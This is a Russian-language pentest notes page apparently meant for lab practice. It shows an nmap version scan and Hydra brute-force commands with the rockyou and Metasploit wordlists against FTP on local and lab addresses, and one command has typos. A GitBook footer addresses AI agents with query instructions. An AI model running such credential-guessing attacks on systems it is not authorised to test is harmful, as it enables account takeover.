> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/ports-and-services/ftp-21/ftp-brute-force-attack.md).

# FTP — атака перебором

1. Запустите следующую команду с [Nmap](/ru/reconnaissance/nmap.md) чтобы проверить версию FTP и найти известные уязвимости:

```bash
nmap -sCV -p21 127.0.0.1
```

2. Установленная версия — **7.93** и известных уязвимостей не обнаружено.

<figure><img src="/files/c173aa3529cd037101d99e6d1f7ebd372ab4a266" alt=""><figcaption></figcaption></figure>

3. Запустите атаку перебором с помощью **Hydra**. Строчная `-l`  или `-p` означает, что имя пользователя или пароль заданы напрямую; прописная `-L`  или `-P` означает, что Hydra считывает значения из файла.

```bash
hydra -l jordan -P /usr/share/wordlists/rockyou.txt ftp://127.0.0.1 -t 15
```

4. Действительные учетные данные найдены.

<div data-full-width="false"><figure><img src="/files/bd83f31f35626c51cc7c42dd8bd64b3abf1e004e" alt=""><figcaption></figcaption></figure></div>

**FTP brute force с популярными словарями пользователей и паролей**

{% code overflow="wrap" %}

```bash
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-frameword/data/wordlists/unix_passwords.txt 10.10.10.10. -t 4 ftp
```

{% endcode %}


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/ports-and-services/ftp-21/ftp-brute-force-attack.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
